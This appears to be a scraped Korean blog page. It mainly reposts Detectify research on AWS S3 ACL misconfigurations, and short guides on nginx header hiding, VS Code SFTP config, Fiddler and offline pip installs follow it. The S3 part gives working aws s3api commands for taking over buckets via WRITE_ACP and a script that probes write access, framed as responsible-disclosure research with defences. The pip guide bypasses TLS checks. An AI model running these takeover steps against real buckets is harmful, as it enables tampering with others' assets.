https://labs.detectify.com/writeups/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/

 

A deep dive into AWS S3 access controls - Labs Detectify

Original research from Frans Rosen on vulnerabilities in AWS S3 bucket access controls and how to do set it up properly and monitor security.

labs.detectify.com

 

TL;DR: Setting up access control of AWS S3 consists of multiple levels, each with its own unique risk of misconfiguration. We will go through the specifics of each level and identify the dangerous cases where weak ACLs can create vulnerable configurations impacting the owner of the S3-bucket and/or through third party assets used by a lot of companies. We also show how to do it properly and how to monitor for these sorts of issues.

A simplified version of this write-up is available on the Detectify blog.

Quick background

Amazon Web Services (AWS) provides a service called Simple Storage Service (S3) which exposes a storage container interface. The storage container is called a “bucket” and the files inside the bucket are called “objects”. S3 provides an unlimited storage for each bucket and owners can use them to serve files. Files can be served either privately (via signed URLs) or publicly via an appropriately configured ACL (Access Control List) or ACP (Access Control Policy).

AWS also provides a (CDN) service called CloudFront which is often configured to quickly serve S3 hosted files/objects from an optimized CloudFront server as close as possible to the user who is requesting the file.

Introduction

Recently, a few blog posts have mentioned scenarios where the misconfiguration of a S3 bucket may expose sensitive data as well as explaining that the S3 access control lists (ACL) are quite different to the regular user permission setup in AWS which is called Identify Access Management (IAM).

However, we decided to approach this from a different angle. By identifying a number of different misconfigurations we discovered that we could suddenly control, monitor and break high end websites due to weak configurations of the bucket and object ACLs.

Disclaimer

All instances disclosed below were reported to the affected parties using responsible disclosure policies. In some of the cases, third party companies were involved and we got assistance from the companies affected to contact the vulnerable party.

We do not recommend testing any of the vulnerable scenarios below without prior approval. This is especially important in scenarios where the only way to identify the vulnerability was to actually override files and configurations. We did, however, identify one method to detect one of the vulnerable setups without actually modifying the data. You should still make sure you’re not affecting any party that has not given you written approval.

Technical details

The different misconfigurations and the impact of each depend on the following criteria:

  • Who owns the S3 bucket
  • What domain is being used to serve the files from the bucket
  • What type of files are inside the bucket

We will try to go through all different cases below and explain when they can be created with a vulnerable misconfiguration.

Identification of buckets

To start off, we need to be able to identify buckets owned by or used by the company. We need the specific bucket’s name to make signed requests to the bucket.

Identifying a bucket depends on the setup and also how the bucket is being reached: The request can go directly to S3, to CloudFront (or any other CDN proxy serving files from the bucket), to the S3 “Static Website” option, or more.

Some methods to identify S3-buckets are:

  • Look at the HTTP-response for a Server-header which says AmazonS3.
  • Look at a random URL that doesn’t exist and see if it gives you a S3-404, either with “Static Website enabled” or not, containing Access Denied or NoSuchKey: 
  •  
  • The DNS-entry of the domain might reveal the bucket-name directly if the host points directly to S3.
  • Try accessing the root-URL. If index-listing is enabled (public READ on the Bucket ACL) you will be able to see the bucket-name defined in <Name>-element.

We have identified multiple ways to make an S3-bucket actually reveal itself independent of proxies in front of it. We have notified AWS about these methods and chosen not mention them above.

If you do find a domain that is pointing to a bucket, but cannot get the bucket name, try the actual fully qualified domain name (FQDN) as the bucket name, this is a common setup, having the bucket named as the domain that is pointing to it.

If this doesn’t work, try to:

  • Google the domain and see if any history of it exposes the bucket name.
  • Look at response headers of objects in the bucket to see if they have meta data that reveals the bucket name.
  • Look at the content and see if it refers to any bucket. We’ve seen instances where assets are tagged with the bucket name and a date when they were deployed.
  • Brute-force. Be nice here, don’t shoot thousands of requests against S3 just to find a bucket. Try be clever depending on the name of the domain pointing to it and the actual reason why the bucket exists. If the bucket contains audio files for ACME on the domain media.acme.edu, try media.acme.edu, acme-edu-media, acme-audio or acme-media.

If the response on $bucket.s3.amazonaws.com shows NoSuchBucket you know the bucket doesn’t exist. An existing bucket will either give you ListBucketResult or AccessDenied.

(You might also stumble upon AllAccessDisabled, these buckets are completely dead).

Remember, just because a bucket is named as the company or similar, that doesn’t mean it is owned by that company. Try find references directly from the company to the bucket to confirm it is indeed owned by the specific company.

Permission/predefined groups

First, we will explore the different options that can be used for giving access to a requester of a bucket and the objects within:

ID / emailAddress

You are able to give access to a single user inside AWS using either the AWS user ID or their email address. This makes sense if you want to allow a single user to have specific access to the bucket.

AuthenticatedUsers

This is probably the most misunderstood predefined group in AWS S3’s ACL. Having the ACL set to AuthenticatedUsers basically means “Anyone with a valid set of AWS credentials”. All AWS accounts that can sign a request properly are inside this group. The requester doesn’t need to have any relation at all with the AWS account owning the bucket or the object. Remember that “authenticated” is not the same thing as “authorized”.

This grant is likely the most common reason a bucket is found vulnerable in the first place.

AllUsers

When this grant is set, the requester doesn’t even need to make an authenticated request to read or write any data, anyone can make a PUT request to modify or a GET request to download an object, depending on the policy that is configured.

Policy permissions / ACP (Access Control Policies)

The following policy permissions can be set on the bucket or on objects inside the bucket.

The ACPs on bucket and objects control different parts of S3. AWS has a list showing exactly what each grant does. There are more cases not mentioned below where you can create specific IAM policies for a bucket, called a bucket-policy. Creating a bucket-policy has its own issues, however, we will only cover the standard setup of ACLs set on buckets and objects.

READ

This gives the ability to read the content. If this ACP is set on a bucket, the requester can list the files inside the bucket. If the ACP is set on an object, the content can be retrieved by the requester.

READ will still work on specific objects inside a bucket, even if Object Access READ is not set on the complete bucket.

With the following ACL setup inside AWS S3:

Bucket-ACL: Object-ACL:

We can still read the specific object:

$ aws s3api get-object --bucket test-bucket --key read.txt read.txt
{
    "AcceptRanges": "bytes", 
    "ContentType": "text/plain", 
    "LastModified": "Sun, 09 Jul 2017 21:14:15 GMT", 
    "ContentLength": 43, 
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0"", 
    "Metadata": {}
}

This means READ can be different for each object, independently of the settings on the bucket.

READ_ACP

This permission gives the ability to read the access control list of the bucket or object. If this is enabled, you can identify vulnerable assets without trying to modify the content or ACP at all.

READ_ACP will still work on specific objects inside a bucket, even if Object Access READ_ACP is not set on the complete bucket.

Bucket-ACL: Object-ACL:
$ aws s3api get-object-acl --bucket test-bucket --key read-acp.txt        
{
    "Owner": {
        "DisplayName": "fransrosen", 
        ...

This means READ_ACP can be different for each object, independently of the settings on the bucket.

WRITE

This permission gives the ability to write content. If the bucket has this enabled for a user or group, that party can upload, modify and create new files.

WRITE will not work on specific objects inside a bucket, if Object Access WRITE is not set on the complete bucket:

Bucket-ACL: Object-ACL:
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

However, if WRITE is set on the bucket, all objects will obey and will not be able to decide individually if they should be writable or not:

Bucket-ACL: Object-ACL:
$ aws s3api put-object --bucket test-bucket --key write.txt --body write.txt
{
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
}

This means, WRITE can be verified on the bucket in two ways, either by uploading a random file, or by modifying an existing one. Modifying an existing file is destructive and should not be done at all. Below we will explain a way to check this without doing a destructive call, by triggering an error in between the access control check and the actual modification of the file.

WRITE_ACP

This permission gives the ability to modify the permission ACL of a bucket or object.

If the bucket has this enabled for a user or a group, that party can modify the ACL of the bucket which is extremely bad. Having WRITE_ACP on a bucket will completely expose it to be controlled by the party having the ACP set, meaning any content of any object can now be controlled by the party. The attacker might not be able to READ every object already in the bucket, but they can still fully modify the existing objects. Also, the initial owner of the S3-bucket will get an Access Denied in the new AWS S3-console when the attacker is claiming ownership of it when removing the READ-access on the bucket.

First, no access to READ_ACP or WRITE:

$ aws s3api get-bucket-acl --bucket test-bucket

An error occurred (AccessDenied) when calling the GetBucketAcl operation: Access Denied

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

Then we try to change the bucket ACL:

$ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
success

The initial owner of the bucket will now see this:


(Being the owner, they will still be able to modify the policy of the bucket, but this is a weird case anyway.)

We can now control everything:

$ aws s3api get-bucket-acl --bucket test-bucket
{
...
    "Grants": [
        {
            "Grantee": {
                "Type": "CanonicalUser", 
                "DisplayName": "frans", 
                "ID": "..."
            }, 
            "Permission": "FULL_CONTROL"

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
{
    "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
}

A very interesting thing is that WRITE_ACP will actually still work on specific objects inside a bucket even if Object Access WRITE_ACP is not set on the complete bucket:

Bucket-ACL: Object-ACL:
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success

Also, the opposite of WRITE applies here, having WRITE_ACP on the bucket, doesn’t mean you directly have WRITE_ACP on an object:

Bucket-ACL: Object-ACL:
$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-full-control emailaddress=frans@example.com

An error occurred (AccessDenied) when calling the PutObjectAcl operation: Access Denied

However, by performing the following steps when having WRITE_ACP on the bucket you will still gain full access of the content of any object, by replacing the existing object with new content:

  1. Modify the bucket ACL:
    $ aws s3api put-bucket-acl --bucket test-bucket --grant-full-control emailaddress=frans@example.com && echo "success"
    success
  2. Modify the object (This changes you to the owner of the object):
    $ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt
    {
     "ETag": ""1398e667c7ebaa95284d4efa2987c1c0""
    }
  3. Modify ACP of the object again:
    $ aws s3api put-object-acl --bucket test-bucket --key write1.js --grant-full-control emailaddress=frans@example.com && echo "success"
    success

Since WRITE still needs to be set on the bucket, you cannot upgrade a WRITE_ACP on an object to give yourself WRITE on the same object:

$ aws s3api put-object-acl --bucket test-bucket --key write-acp.txt --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers --grant-read uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers && echo "success"
success
Bucket-ACL: Object-ACL:

This will still give you:

$ aws s3api put-object --bucket test-bucket --key write-acp.txt --body write-acp.txt

An error occurred (AccessDenied) when calling the PutObject operation: Access Denied

However, you can still remove all ACPs on the object, making the object completely private, which will stop it being served, giving a 403 Forbidden.

WRITE_ACP can unfortunately only be verified by testing writing a new ACP on a bucket or object. Modifying the existing one is of course destructive and should not be done without approval. We have not found a non-destructive way of testing this ACP.

FULL_CONTROL

This is the policy that combines all other policies. However, WRITE will still not work on an object unless the bucket has it set, even if this permission is set on an object.

Vulnerable scenarios

The following scenarios are cases where the company can be affected.

1. Bucket used on a domain owned by the company

You found a bucket which is served by a subdomain or domain of the company.

You should test for:

  • BUCKET READ
    Listing files in the bucket. Sensitive information might be exposed.
  • BUCKET READ-ACP
    Let’s look at the ACP and see if we can identify the bucket being vulnerable without actually trying anything. If we see that AllUsers or AuthenticatedUsers has WRITE_ACP set, we know we can gain full control over the bucket, without doing anything else.
  • BUCKET WRITE (Simulate using invalid-MD5 hack)
    If we can upload a new file to the bucket. This also tells us we can overwrite any object in the bucket. However, if we want to avoid uploading anything, we can try the following hack, not uploading anything but still see that we are able to do it:
    When making a signed PUT request to a bucket, we have the option to add a Content-MD5 telling AWS the checksum of the content being uploaded. It turns out that this check is happening inside the following flow:
    1. Check that the user has access writing the file.
    2. Check that the MD5-checksum is matching the content.
    3. Upload the file.
    Since the checksum control happens after we know that we have access to the file, but before actually modifying it, we do not need to write to the file to know that we are able to.
    # use this by: ./put-simulate.sh test-bucket/write.txt 
    AWS_ACCESS_KEY_ID="***"
    AWS_SECRET_ACCESS_KEY="***"
    AWS_S3_BUCKET="$(echo "$1" | cut -d "/" -f1)"
    AWS_PATH="/$(echo "$1" | cut -d "/" -f2-)"
    date=$(date +"%a, %d %b %Y %T %z")
    acl="x-amz-acl:private"
    content_type='application/octet-stream'
    
    # we create a checksum of the word "yepp", but will upload a file with the content "nope".
    content_md5=$(openssl dgst -md5 -binary <(echo "yepp") | openssl enc -base64)
    
    string="PUTn${content_md5}n${content_type}n${date}n${acl}n/${AWS_S3_BUCKET}${AWS_PATH}"
    signature=$(echo -en "${string}" | openssl sha1 -hmac "${AWS_SECRET_ACCESS_KEY}" -binary | base64)
    echo "PUT to S3 with invalid md5: ${AWS_S3_BUCKET}${AWS_PATH}"
    result=$(curl -s --insecure -X PUT --data "nope" 
    -H "Host: ${AWS_S3_BUCKET}.s3.amazonaws.com" 
    -H "Date: $date" 
    -H "Content-Type: ${content_type}" 
    -H "Content-MD5: ${content_md5}" 
    -H "$acl" 
    -H "Authorization: AWS ${AWS_ACCESS_KEY_ID}:${signature}" 
    "https://${AWS_S3_BUCKET}.s3.amazonaws.com${AWS_PATH}")
    
    if [ "$(echo ${result} | grep 'The Content-MD5 you specified did not match what we received')" != "" ]; then
      echo "SUCCESS: ${AWS_S3_BUCKET}${AWS_PATH}"
      exit 0
    fi
    echo "$result"
    exit 1
    On a bucket we can upload to, this will result in:On a bucket we cannot upload to, this will result in:We will therefore never modify the content, only confirm we can do it. This unfortunately only works on WRITE on objects, not on WRITE_ACP as far as we know.
  • $ ./put-simulate.sh test-secure-bucket/write.txt PUT to S3 with invalid md5: test-secure-bucket/write.txt <?xml version="1.0" encoding="UTF-8"?> <Error><Code>AccessDenied</Code><Message>Access Denied</Message>
  • $ ./put-simulate.sh test-bucket/write.txt PUT to S3 with invalid md5: test-bucket/write.txt SUCCESS: test-bucket/write.txt
  • The following bash code simulates this scenario:
  • BUCKET WRITE-ACP
    The most dangerous one. Fully upgradable to full access of the bucket. Destructive call. Be careful. The only way to do this one properly is to first figure out how the bucket behaves to not break any current ACP. Remember that you can still have access to WRITE_ACP even though you do not have access to READ_ACP.
    API-documentation reference
  • OBJECT READ
    We can try to read the content of files we are interested in found by BUCKET READ.
  • OBJECT WRITE
    No need to test this one, since BUCKET WRITE decides fully. If BUCKET WRITE gives an error the object will not be writable and if BUCKET WRITE is successful, the object will always be writable.
    However, if the company using the bucket has an application where users can upload files, look at the implementation of how they make the actual file upload to S3. If the company is using a POST Policy upload, specifically look in the policy at the Condition Matching of the $key and the Content-type. Depending on if they use starts-with you might be able to modify the content type to HTML/XML/SVG or similar, or change the location of the file being uploaded.
  • OBJECT WRITE-ACP
    We can try modifying the ACP of the specific object. It will not enable us to modify the content, but only the access control of the file, giving us the ability to stop files from working publicly.
    API-documentation reference

Possible vulnerabilities:

  • Reflected XSS. If we can do BUCKET READ we can list assets and might find vulnerable objects, like a vulnerable SWF served on the company’s domain.
  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (also meaning OBJECT WRITE) we can modify existing content or create new content, being able to modify javascript/css-files or by uploading a new HTML-file.
  • Denial of server. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly.
  • Information disclosure. If we can list objects we might find sensitive information.
  • RCE. If the bucket contains modifiable executables this can result in Remote Code Execution (RCE) depending on where the executables are being used and if/by whom they are being downloaded.

2. Assets from bucket used by the company

Additional Disclaimer: The assets being used by a company might not always be owned by the company. You need to be extremely careful here not to attack anyone other than the intended target who has given you permission to test.

There are projects trying to automate this, such as Second Order. However, Second Order only checks for assets being referenced in the HTTP-response, files being loaded dynamically are not being checked. Below is a quick example of also checking for dynamically loaded assets using Headless Chrome.

First, start the headless version on port 9222:

"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --disable-gpu --headless

We can then use a small script. (context.js is borrowed from the HAR-capturer-project since that one properly closes tabs)

const CDP = require('chrome-remote-interface');
const URL = require('url').URL;
const Context = require('./context');

async function log_requests(orig_url) {
    const context = new Context({});

    process.on('SIGTERM', function () {
        context.destroy();
    });

    try {
        const client = await context.create();
        const {Network, Page} = client;
        const ourl = new URL('http://' + orig_url);
        const ohost = ourl.host;

        Network.requestWillBeSent((params) => {
            if (params.request.url.match('^data:')) {
                return;
            }
            const url = new URL(params.request.url);
            console.log(ohost + ':' + url.host + ':' + params.request.url);
        });
        await Promise.all([Network.enable(), Page.enable()]);
        await Page.navigate({url: 'http://' + orig_url});
        await Page.loadEventFired();
        await Page.navigate({url: 'https://' + orig_url});
        await Page.loadEventFired();
    } finally {
        await context.destroy();
    }
}
const url = process.argv.slice(2)[0];
log_requests(url);

Which will give us all assets on the page which we then can use to figure out if they are served from S3 or not:

You should test for:

Possible vulnerabilities:

  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (also meaning OBJECT WRITE) we can modify existing content or create new content, being able to modify javascript/css-files or similar. This can be extremely bad depending on where the assets are being used, such as on login pages or on main pages.
  • Denial of server. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly.
  • RCE. If assets are modifiable executables this can result in Remote Code Execution (RCE) depending on where the executables are being used and if/by whom they are being downloaded.

3. Bucket randomly found, indications it’s owned by the company

This one is a bit complicated. You need to have clear evidence and proof that the bucket is indeed owned by the company. Try to find references from the company pointing to this bucket, such as references on their website, CI logs or open source code.

You should test for:

Possible vulnerabilities:

  • Stored XSS / asset control. If we can do BUCKET WRITE or BUCKET WRITE-ACP (also meaning OBJECT WRITE) we can modify existing content or create new content, being able to modify javascript/css-files. However, in this case we don’t know where the files are being used so we cannot know how big the impact is without talking with the company.
  • Denial of server. If we can modify the ACP of objects using OBJECT WRITE-ACP, we can prevent objects from loading publicly. We do not know in this case if they are however.
  • Information disclosure. If we can list objects we might find sensitive information. Only do this if you have confirmed that the bucket is indeed connected to the company you have approval from.
  • RCE. If the bucket contains modifiable executables this can result in Remote Code Execution (RCE) depending on where the executables are being used and if/by whom they are being downloaded.

Results

During this research we were able to confirm we could control assets on high profile websites. We reported these issues directly and were able to get them solved quickly. The following categories of websites were affected:

  • Password managers
  • DNS/CDN providers
  • File storage
  • Gaming
  • Audio and video streaming providers
  • Health tracking

We identified vulnerable assets placed on the login pages of some companies.

In some cases, vulnerable assets were loaded using Google Tag Manager (gtm.js) however, they did not sandbox the third parties properly, running the third party assets directly on the domain itself (not by sandboxing them using www.googletagmanager.com)

We got in touch with some third party providers, both directly but also with help from the affected companies, quickly identifying the issue and solving it very fast.

How to stay safe

The following processes can prevent this issue from happening:

  1. Sandbox third party assets. As soon as you are in need of third party assets, through gtm.js or similar, try isolating the scripts either by using the iframe provided by Google Tag Manager or by placing them on a separate domain (not only using a subdomain). Also ask your provider how they handle access control on their files, and if they are using S3 for file serving.
  2. If you have your own buckets, take a look through the bucket ACLs to verify WRITE and WRITE_ACP are only set on specific users, never on groups such as AllUsers or AuthenticatedUsers.
  3. The hardest fix is to prevent any object in any bucket from having WRITE_ACP, test yourself by doing a aws s3api put-object-acl with the appropriate settings using a restricted AWS-user against your own objects in your buckets. You might need to update the ACL on every object to mitigate this completely.
  4. Take a look and see how you are uploading objects to S3 buckets and make sure you set the proper ACLs on both buckets and objects.
  5. Do not use a secret bucket name as a form of Security through Obscurity. Treat the bucket name like it is already public information.

On a final note

It’s clear after this research that this problem is widespread and hard to identify and completely solve, especially if the company uses a huge amount of buckets, created by different systems. WRITE_ACP is the most dangerous one for reasons mentioned, both on buckets and objects.

An interesting detail when manually uploading files to S3 using Cyberduck, changing the access control on a file looks like this:

Pretty easy to accidentally pick the wrong one there.

Until next time.

What Detectify scans for

Detectify tests web applications for the following S3 misconfiguration vulnerabilities with a severity range between 4.4-9 on the CVSS scale:

  • Amazon S3 bucket allows for full anonymous access
  • Amazon S3 bucket allows for arbitrary file listing
  • Amazon S3 bucket allows for arbitrary file upload and exposure
  • Amazon S3 bucket allows for blind uploads
  • Amazon S3 bucket allows arbitrary read/writes of objects
  • Amazon S3 bucket reveals ACP/ACL

 

'경로 및 정보' 카테고리의 다른 글

eSIM 구현 Android 오픈소스  (0) 2024.03.06
Teleport 관련 자료  (1) 2024.02.24
nginx version 숨기기 및 header 정보 숨기기  (1) 2023.12.07
/.vscode/sftp.json  (0) 2023.11.19
Active Directory Basic 문제  (0) 2023.11.12
블로그 이미지

wtdsoul

,

https://xinet.kr/?p=3478

 

nginx version 숨기기 및 header 정보 숨기기 ( nginx remove the server header )

기본적으로 Nginx에서 nginx 버전 정보를 숨기는 것은 간단하게 해결 할수 있다기본값이 on 상태일때 값을 확인해 보면버전 정보를 숨기기 위해서는 nginx.conf 환경설정에서 server_tokens 값을 off 로 변

xinet.kr

 

기본적으로 Nginx에서 nginx 버전 정보를 숨기는 것은 간단하게 해결 할수 있다
기본값이 on 상태일때 값을 확인해 보면

 
 
 
 
 
Shell
 
1
2
3
4
5
[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf
 
 
### version hide
    server_tokens on;

이렇게 구성할 경우 버전이 출력된다

 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
8
9
10
11
[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Server: nginx/1.21.7
Date: Fri, 29 Apr 2022 06:58:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=nv5flpefh076b2a92taf95u093; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"


버전 정보를 숨기기 위해서는 nginx.conf 환경설정에서 server_tokens 값을 off 로 변경하면 된다

 
 
 
 
 
Shell
 
1
2
3
4
[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf
 
### version hide
    server_tokens off;

nginx 재시작 후 확인

 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@xinet ~]# systemctl restart nginx
 
 
[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Apr 2022 07:02:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=1ljq6md9ngrd6q7pm3njstrlst; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"

이렇게 하면 버전의 정보를 숨길 수가 있다


웹페이지에서도 확인해보자

그러면 header 값에 server에 nginx 값이 표시가 되는데 이것도 숨길 수가 있다
모듈이 추가해서 이용하면 되는데 사용되믄 모듈은 ngx_security_headers 이용하면 된다

다운로드 후 모듈을 생성 후 추가해주면 된다

 
 
 
 
 
Shell
 
1
2
3
[root@xinet ~]# cd /usr/local/src/
 

기본 설치된 버전 없으면 다운로드 있으면 처음 설치 폴더로 가서 모듈 생성 및 복사

 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
[root@xinet src]# cd nginx-1.21.6/
 
[root@xinet nginx-1.21.6]# ./configure --with-compat --add-dynamic-module=/usr/local/src/ngx_security_headers
 
[root@xinet nginx-1.21.6]# make modules
 
[root@xinet nginx-1.21.6]# cp -a objs/ngx_http_security_headers_module.so /usr/local/nginx/modules/

모듈이 복사가 되었으면 환경설정 값에  추가

 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
8
9
[root@xinet nginx-1.21.6]# vi /usr/local/nginx/conf/nginx.conf
 
 
 
 
load_module modules/ngx_http_security_headers_module.so;
 
### header hide
    hide_server_tokens on;

nginx 재시작 및 curl 확인 server 정보가 표시되지 않는다

 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
8
9
10
11
12
13
[root@xinet ~]# systemctl restart nginx
 
 
[root@xinet ~]# curl -IsL https://xinet.kr --insecure
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 06:52:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=ukiujk8i29fo97enqlr4fops2i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Link: <https://xinet.kr/index.php?rest_route=/>; rel="https://api.w.org/"


크롬 웹페이지에서 확인

만약 yum 으로 설치된 환경이라면  해당 설치 후 모듈 추가된거 확인 후 이용하면 된다

 
 
 
 
 
Shell
 
1
2
3
yum -y install https://extras.getpagespeed.com/release-latest.rpm
 
yum -y install nginx-module-security-headers
 
 
 
 
 
Shell
 
1
2
3
4
5
6
7
load_module modules/ngx_http_headers_more_filter_module.so;
 
http {
    ...
    more_clear_headers Server;
    ...
}

 

'경로 및 정보' 카테고리의 다른 글

Teleport 관련 자료  (1) 2024.02.24
A deep dive into AWS S3 access controls – taking full control over your assets  (1) 2024.02.05
/.vscode/sftp.json  (0) 2023.11.19
Active Directory Basic 문제  (0) 2023.11.12
Fiddler 셋팅  (0) 2023.11.10
블로그 이미지

wtdsoul

,

https://dev-blackcat.tistory.com/1

 

[VSCODE] 비주얼스튜디오코드(Visual Studio Code) SFTP 연동하기

먼저, 확장 탭을 클릭 후 "SFTP" 검색한 후 아래의 이미지의 확장을 설치해 주세요. 새로운 폴더 혹은 기존 프로젝트 폴더를 열어주신 후 "F1"을 눌러 "sftp" 검색 후 "sftp:config"을 선택해 주세요. 아래

dev-blackcat.tistory.com

 

먼저, 확장 탭을 클릭 후 "SFTP" 검색한 후 아래의 이미지의 확장을 설치해 주세요.

VSCODE 확장프로그램

 

새로운 폴더 혹은 기존 프로젝트 폴더를 열어주신 후 "F1"을
눌러 "sftp" 검색 후 "sftp:config"을 선택해 주세요.

VSCODE 확장프로그램

 

아래와 같이 ".vscode" 폴더가 생성되며 "sftp.json" 파일이 생성됩니다.

VSCODE 확장프로그램

 

초기 생성 시 없는 속성이 있습니다. 아래와 비교하여 추가해 주세요.

옵션 설명
uploadOnSave 저장시에 자동으로 업로드 (true/false)
igonre 업/다운로드를 제외할 파일 및 폴더 보안상 ".vscode" 폴더 안의 파일 내용에는 서버 계정의 비밀번호까지 있기 때문에 대부분 설정합니다.
{
    "name": "프로젝트 이름",
    "host": "서버 IP 주소",
    "protocol": "sftp",
    "port": 22,
    "username": "서버 계정",
    "password": "서버 비밀번호",
    "remotePath": "서버 디렉토리 루트",
    "uploadOnSave": true,
    "watcher": {
        "files": "**/*",
        "autoUpload": true,
        "autoDelete": true
    },
    "ignore": [
        "**/.vscode",
        "**/.git",
        "**/.DS_Store",
        "**/.sftp.json",
        "**/node_modules"
    ]
}

 

예제

다시 "F1"을 눌러 "sftp:Download Project"을 선택하여 프로젝트 다운로드하기

{
    "name": "TEST Project",
    "host": "01.234.567.890",
    "protocol": "sftp",
    "port": 22,
    "username": "root",
    "password": "123456",
    "remotePath": "/root/test",
    "uploadOnSave": true,
    "watcher": {
        "files": "**/*",
        "autoUpload": true,
        "autoDelete": true
    },
    "ignore": [
        "**/.vscode",
        "**/.git",
        "**/.DS_Store",
        "**/.sftp.json",
        "**/node_modules"
    ]
}
 
 
 
블로그 이미지

wtdsoul

,

https://tryhackme.com/room/winadbasics

 

TryHackMe | Active Directory Basics

This room will introduce the basic concepts and functionality provided by Active Directory.

tryhackme.com

 

슬슬 시작할때가 왔구만... 

 

Several groups are created by default in a domain that can be used to grant specific privileges to users. As an example, here are some of the most important groups in a domain:

Security Group Description
Domain Admins Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.
Server Operators Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.
Backup Operators Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.
Account Operators Users in this group can create or modify other accounts in the domain.
Domain Users Includes all existing user accounts in the domain.
Domain Computers Includes all existing computers in the domain.
Domain Controllers Includes all existing DCs on the domain.

You can obtain the complete list of default security groups from the Microsoft documentation.

 

블로그 이미지

wtdsoul

,

Fiddler 셋팅

경로 및 정보 2023. 11. 10. 10:55

 

Fiddler 내부망

 

Options > HTTPS > Decrypt

Conntection 8888 확인 > 브라우저 127.0.0.1 > 인증서 설치

Gateway > Manual Proxy Config > 127.0.0.1:8080 (Burp 포트 넘버)

 

캡처링 (F12) 체크한 뒤 Burp 통해서 패킷을 받아 봄

블로그 이미지

wtdsoul

,

https://seonu-lim.github.io/python/%EC%98%A4%ED%94%84%EB%9D%BC%EC%9D%B8%EC%97%90%EC%84%9C-%ED%8C%8C%EC%9D%B4%EC%8D%AC%ED%8C%A8%ED%82%A4%EC%A7%80-%EC%84%A4%EC%B9%98%ED%95%98%EA%B8%B0/

 

오프라인 상태에서 패키지를 설치하기?

이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허

seonu-lim.github.io

 

이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허가를 받아야 데이터의 반출이 가능하다. 사내 메신저나 메일도 VDI 안에서만 확인이 가능하다… 게다가 인터넷은 회사 홈페이지를 제외하고는 연결이 되지 않는다!

이렇게 폐쇄적인 환경이다보니, 개발이나 분석 툴로써 파이썬을 사용할 때에도 어려움이 따른다. 패키지들을 설치하려면 보통은 pip 이나 conda 를 사용하는데 인터넷 연결이 되지 않으니 패키지를 다운받는 게 정말 번거로운 일이 된다. 설상가상으로 나는 지금 회사에서 파이썬 교육 업무를 맡고 있어서, 아무것도 모르는 사람들이 VDI 에 패키지를 설치할 수 있도록 만들어주어야 한다. 따라서 최대한 간소한 방법을 서술하도록 하겠다.

우선 VDI 를 접속하는 로컬 컴퓨터는 몇몇 사이트를 제외하고 인터넷 연결이 되기 때문에 우선 로컬에서 원하는 패키지를 인스톨한다. 단, 우리 회사 인터넷망에서는 그냥 pip install foo 하면, 뭔 ssl certificate 이 어쩌구 하면서 에러가 난다. 그러므로 다음과 같이 argument를 더해주도록 한다.

pip --trusted-host pypi.org --trusted-host files.pythonhosted.org install foo

